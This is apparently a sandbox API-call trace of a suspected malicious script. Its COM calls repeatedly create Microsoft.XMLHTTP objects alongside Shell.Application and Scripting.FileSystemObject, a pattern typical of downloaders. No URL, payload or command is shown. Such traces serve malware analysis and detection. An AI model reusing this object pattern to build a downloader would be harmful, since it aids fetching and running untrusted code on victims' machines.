	[0247.356] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0248.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0248.810] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0248.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0248.810] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0248.810] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0248.811] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0248.811] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0248.811] SysStringLen (param_1=0x0) returned 0x0
	[0248.811] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0248.811] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0248.811] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0248.811] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0248.811] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0248.811] ??2@YAPEAX_K@Z () returned 0x62f350
	[0248.811] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0248.811] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0248.811] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0248.811] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0248.811] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0248.811] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0248.811] SysStringLen (param_1=0x0) returned 0x0
	[0248.811] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0248.814] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0248.814] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0248.814] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0248.814] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0248.814] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0248.814] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0249.309] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0249.309] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0249.310] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0249.311] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0249.311] SysStringLen (param_1=0x0) returned 0x0
	[0249.311] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0249.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0249.311] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c00) returned 0x0
	[0249.311] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0249.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0249.311] ??2@YAPEAX_K@Z () returned 0x62f310
	[0249.311] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0249.311] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0249.311] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0249.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c00) returned 0x0
	[0249.311] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c00) returned 0x3
	[0249.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0249.312] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c00, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0249.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c00, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.314] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0249.314] SysStringLen (param_1=0x0) returned 0x0
	[0249.314] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0249.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0249.314] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7510) returned 0x0
	[0249.314] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0249.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0249.314] ??2@YAPEAX_K@Z () returned 0x62f330
	[0249.315] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0249.315] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7510) returned 0x0
	[0249.315] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7510) returned 0x3
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0249.315] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7510, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7510, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.315] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0249.315] SysStringLen (param_1=0x0) returned 0x0
	[0249.315] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0249.315] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0249.315] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0249.315] ??2@YAPEAX_K@Z () returned 0x62f310
	[0249.315] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0249.315] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0249.315] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0249.315] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0249.315] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0249.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.316] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0249.316] SysStringLen (param_1=0x0) returned 0x0
	[0249.316] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0249.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0249.316] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b80) returned 0x0
	[0249.316] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0249.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7578) returned 0x0
	[0249.316] ??2@YAPEAX_K@Z () returned 0x62f330
	[0249.316] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7578, pUnkSite=0x62f330) 
	[0249.316] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0249.316] XMLHTTPRequest:IUnknown:Release (This=0x49c7578) returned 0x0
	[0249.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b80) returned 0x0
	[0249.316] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b80) returned 0x3
	[0249.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0249.316] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b80, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0249.316] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b80, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0249.316] longjmp () 
	[0249.316] longjmp () 
	[0249.316] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0249.316] SysStringLen (param_1=0x0) returned 0x0
